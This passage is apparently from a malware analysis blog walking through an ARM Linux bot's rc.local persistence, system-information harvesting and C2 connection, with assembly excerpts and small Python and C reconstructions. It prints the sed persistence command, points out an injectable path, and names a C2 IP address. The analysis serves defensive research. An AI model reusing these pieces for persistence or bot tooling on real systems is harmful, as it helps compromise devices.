A string is formatted and the sed program is called to write to the file in question (there are several string operations; for example, sed -i -e '2 i%s/%s' /etc/rc.local is formatted). This is then passed to system, as described above. The buffer used in all of these formatting operations is at the virtual address 0x9F48 and has a size of 300 bytes. Technically, since the input is un-sanitized we could manipulate the path that the malware resides in and utilise a format string exploit. We could therefore manipulate the stack: read local variables, overwrite addresses etc. This is the only persistence method used by the bot.
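To make the formatting step concrete, here is a minimal sketch of how that sed command is put together. The directory and the use of kfts as the file name are illustrative assumptions, and the Python % operator stands in for the sample’s sprintf-style call.

```python
SED_TEMPLATE = "sed -i -e '2 i%s/%s' /etc/rc.local"

def build_persistence_command(directory, name):
    """Format the shell command the way the sample's sprintf-style call would."""
    return SED_TEMPLATE % (directory, name)

# Hypothetical install location and file name, for illustration only.
print(build_persistence_command("/tmp", "kfts"))
# sed -i -e '2 i/tmp/kfts' /etc/rc.local
```

Because the path lands inside a single-quoted shell argument without any escaping, a directory name containing a quote would change what system ends up executing.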


Information harvesting

The process then forks itself and breaks away from its parent by calling setsid(..). All of the file descriptors are also closed which are inherited from the parent (0-3). A thread is then created to call the SendInfo function which collects information such as the number of CPUs in the system; the network speed; the amount of load on the system CPUs; the local address of the network adapter.

This routine then calls the subroutine get_occupy. We can see that we calculate the load average by iterating over all the CPUs in the system. We can see that r3 is being used as the counter for this loop, then the blt instruction is executed, which branches if the first operand is less than the second. In x86, this is the equivalent of jl. Please note that in earlier versions of this malware a thread used to be created for backdoorA, however not anymore.

The way the malware gets information regarding the network adapter is reading the /proc/net/dev file. It then seeks to the start of the file; and parses it to get the local IP address from the default adapter.

What I found strange about this sample of malware is that it created statistics which had no real meaning, for example it would create a random value and use it as the network speed. In the subroutine fake_net_speed we can see srandom is seeded with time — we pass the first parameter ‘0’ into time as we have no structure to fill (usually, a pointer to time_t would be passed into this function). We then move the result of time into r3; then back into r0 to be a parameter for srandom — this is most likely the compiler being strange for some reason or another.

The value generated by this call is then used in a sprintf statement to create a string which represents the network speed in megabytes per second (apparently). This is super weird, the malware is creating a fake network speed for some reason.. the only conclusion I can come to regarding this is that someone has hired a programmer and they have failed to implement this feature, so they’re faking it to their client/boss etc.

These values are then sent within this subroutine to the main C2..

Communication Initialisation

After all of these operations we finally come to the main core of the bot: the part where it connects to the C2 and receives commands. The procedure ConnectServer (which is at 0xCA1C) is called from the main body of the function; this then branches to ServerConnectCli (0xB5BC), which returns a socket to the C2 server. The global variable MainSocket is then set to this value. Diving into ServerConnectCli...

ServerConnectCli starts by creating a TCP socket. If this operation is not successful, the assembly branches off to a subroutine at 0xB654, which calls perror(..) to display a human-readable error.

For those of you familiar with C, this is like doing:

r0 = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);

The port that we are going to connect to is partly obfuscated by the author. The original number is loaded into the register r3. We then shift this value 16 bits (0x10) to the left (we can see this being done in the lsl instruction), and then shift it back to the right by 16 bits. Then again, this may have been put in there by the compiler, since the net effect is simply to keep the low 16 bits of r3, which is the width of the port number that htons expects. I’ve put the assembly down below so you can see clearly what’s happening.

mov r3, r0
strh r3, [r3, #0x104]
lsl r3, r3, #0x10 // shift r3 LEFT by 0x10
lsr r3, r3, #0x10 // shift r3 RIGHT by 0x10
mov r0, r3
bl htons

You could look at it this way in pseudocode:

r3 = ((r3 << 0x10) >> 0x10)
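
A small C sketch shows why this pair of shifts looks more like compiler output than obfuscation: on a 32-bit value it gives exactly the same result as converting to a 16-bit unsigned type. The function names are hypothetical, and the idea that the original source simply held the port in a 16-bit variable is an assumption.

```c
#include <stdint.h>

/* Mirrors the lsl/lsr pair: shift left by 16, then logically right by 16. */
uint32_t shift_pair(uint32_t r3)
{
    return (r3 << 16) >> 16;
}

/* What the C source may have contained (assumption): a plain 16-bit
 * conversion, which older ARM compilers lower to the same two shifts. */
uint32_t truncate16(uint32_t r3)
{
    return (uint16_t)r3;
}
```

Both functions return 0x5678 for an input of 0x12345678, and leave any valid port number (0-65535) unchanged.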

The bot has a symbol named AnalysisAddress at 0xB1B8. At first sight one may think this is to divert the attention of researchers, but all this subroutine does is set up a hostent struct (http://man7.org/linux/man-pages/man3/gethostbyname.3.html) which we’ll use later on for the connection. We pass in the first parameter in the register ‘r0’ from the location 0xC1FC8, which has the value of 61.147.91.53. We put the return value of gethostbyname into register r3, then perform some arithmetic on it.

The malware makes two calls to setsockopt, one of which passes the IP_DROP_SOURCE_MEMBERSHIP flag. After the above has completed, the malware calls connect to make an initial connection to the C2 server and then uses a mixture of select and getsockopt calls on the socket to ensure that the non-blocking socket has successfully connected. If the connection is not successful the malware will close the socket and exit.

Once we have a working socket returned from ServerConnectCli, the global variable MainSocket is set to the return value. The malware then goes on to gather more statistics from the infected box. First of all, it calls ‘uname’ to identify the system (note that uname reports kernel and machine details, not the name of the user running the executable), with the destination buffer held in ‘r11’. We can see that if the ‘uname’ call fails then “Unknown” will be copied into the destination buffer which originally resided in r11; if it is successful, execution will branch to 0xCA8C.
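
In C, the uname call with its “Unknown” fallback would look roughly like the sketch below. uname fills in a struct utsname describing the running kernel; which field the sample copies out is an assumption (release is used here), and the helper name is hypothetical.

```c
#include <stdio.h>
#include <sys/utsname.h>

/* Hypothetical helper: the choice of u.release is an assumption, the
 * "Unknown" fallback is what the sample does when uname fails. */
void get_system_name(char *out, size_t out_len)
{
    struct utsname u;

    if (uname(&u) == 0)
        snprintf(out, out_len, "%s", u.release);
    else
        snprintf(out, out_len, "%s", "Unknown");
}
```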

More information is gathered about the infected host via the GetCpuInfo function. Although this is self-explanatory, I’ll explain it anyway. The virtual file /proc/cpuinfo is opened and read chunk by chunk, in WORDs, until an EOF (-1) is hit; fclose is then called to close the opened file. The number of CPUs and the clock speed in MHz are then passed back out from this method.
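
A minimal C sketch of this kind of /proc/cpuinfo parsing follows. It reads line by line rather than in WORDs, the function names are hypothetical, and the "processor" and "cpu MHz" field names are an assumption: they are what x86 Linux kernels print, and other architectures may not expose a clock speed at all.

```c
#include <stdio.h>
#include <string.h>

/* Hypothetical parser: counts "processor" entries and keeps the last
 * "cpu MHz" value seen. Returns 0 if at least one CPU was found. */
int parse_cpuinfo(FILE *fp, int *ncpu, int *mhz)
{
    char line[256];
    double speed = 0.0;

    *ncpu = 0;
    *mhz = 0;

    while (fgets(line, sizeof line, fp) != NULL) {   /* NULL at EOF */
        if (strncmp(line, "processor", 9) == 0)
            (*ncpu)++;
        else if (sscanf(line, "cpu MHz : %lf", &speed) == 1)
            *mhz = (int)speed;
    }
    return *ncpu > 0 ? 0 : -1;
}

/* Opens the virtual file, parses it, and closes it again. */
int get_cpu_info(int *ncpu, int *mhz)
{
    FILE *fp = fopen("/proc/cpuinfo", "r");
    if (fp == NULL)
        return -1;

    int rc = parse_cpuinfo(fp, ncpu, mhz);
    fclose(fp);
    return rc;
}
```

Splitting the parser from the file handling means it can be fed any FILE pointer, which makes it easy to try against saved copies of /proc/cpuinfo from other devices.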

The malware then calls sysinfo(..) and reads into the struct (also named sysinfo) which is originally located in r3. We then read several members of this struct, such as the total amount of swap and the total amount of RAM. This is all then formatted and output into a string.
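
For reference, reading these members in C looks roughly like this. It is a Linux-only sketch; the helper name and the conversion to megabytes are assumptions based on the MB fields in the string the malware builds.

```c
#include <sys/sysinfo.h>

/* Hypothetical helper: reports total RAM and total swap in megabytes.
 * Returns 0 on success, -1 if sysinfo() fails. */
int get_memory_mb(unsigned long *ram_mb, unsigned long *swap_mb)
{
    struct sysinfo si;

    if (sysinfo(&si) != 0)
        return -1;

    /* totalram and totalswap are counted in units of mem_unit bytes */
    unsigned long long unit = si.mem_unit ? si.mem_unit : 1;

    *ram_mb  = (unsigned long)((si.totalram  * unit) / (1024ULL * 1024ULL));
    *swap_mb = (unsigned long)((si.totalswap * unit) / (1024ULL * 1024ULL));
    return 0;
}
```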

We can see here that the threat actor seems to be joking about by using the string ‘Hacker’. The string to be formatted is: VERSONEX:Linux-%s|%d|%d MHz|%dMB|%dMB|%s (you’ve spelt ‘version’ wrong, Mr Threat Actor). It’s very strange that sprintf was used earlier rather than snprintf (which helps mitigate buffer overflows to an extent, as the function knows the length of the buffer). Programmers will usually be naturally inclined to use one over the other, so this indicates to me that there may be more than one programmer contributing to this malware.
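
Here is a minimal C sketch of building this string with snprintf. The format string is the one from the sample; the helper name, the argument order and the meaning given to each field are assumptions based on the surrounding description.

```c
#include <stdio.h>

/* Hypothetical helper: returns the length written, or -1 if the output
 * did not fit in the buffer. */
int build_info(char *out, size_t out_len, const char *release,
               int ncpu, int mhz, int ram_mb, int swap_mb, const char *tag)
{
    int n = snprintf(out, out_len,
                     "VERSONEX:Linux-%s|%d|%d MHz|%dMB|%dMB|%s",
                     release, ncpu, mhz, ram_mb, swap_mb, tag);

    /* snprintf returns the length it wanted to write, so n >= out_len
     * means the string was truncated instead of overflowing the buffer */
    return (n < 0 || (size_t)n >= out_len) ? -1 : n;
}
```

With sprintf there is no out_len to check against, so an overly long field would simply write past the end of the buffer.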

In the control flow we can then see that the malware tries to send this information on ‘MainSocket’. If the send is not successful (so, if we send 0) we branch to another subroutine and close the socket.

For those not familiar with ARM, the beq instruction branches if the zero flag is set (that is, if the preceding comparison found its operands to be equal), in this case to address 0xCBD4. This subroutine simply closes the socket, as said before. We then move on to select; if this call is successful we move on to reading data from the C2. Before reading, we zero out the buffer that we are using, and we receive a maximum of 0x1380 bytes. Again, if this is not successful, an error message is printed and we branch to a subroutine which closes the socket and cleans up.
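
The select-then-receive step can be sketched in C as below. The 0x1380 limit is the one seen in the sample; the helper name, the timeout and the return convention are assumptions.

```c
#include <string.h>
#include <sys/select.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <sys/types.h>

#define RECV_MAX 0x1380   /* maximum receive size seen in the sample */

/* Hypothetical helper: waits for data, then reads at most RECV_MAX bytes.
 * buf must be at least RECV_MAX bytes long. Returns the number of bytes
 * read, 0 if the peer closed the connection, or -1 on error or timeout. */
ssize_t recv_command(int fd, char *buf, int timeout_sec)
{
    fd_set rfds;
    FD_ZERO(&rfds);
    FD_SET(fd, &rfds);
    struct timeval tv = { .tv_sec = timeout_sec, .tv_usec = 0 };

    if (select(fd + 1, &rfds, NULL, NULL, &tv) <= 0)
        return -1;

    memset(buf, 0, RECV_MAX);          /* zero the buffer before reading */
    return recv(fd, buf, RECV_MAX, 0);
}
```

Note that a completely full read leaves no room for a terminating NUL, so the result should only be treated as a C string if fewer than RECV_MAX bytes arrive.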

Conclusion, so far..

It is obvious so far that this malware has been programmed by more than one author. We can also see so far that the author has experience in socket programming. The author is also using Pascal case (LikeThis) and names certain functions such as GetCpuInfo, which could in turn indicate to us that the author is used to programming on Windows.

This is the end of this section; we will now move on to the details of the attack methods and what else the bot can be commanded to do.
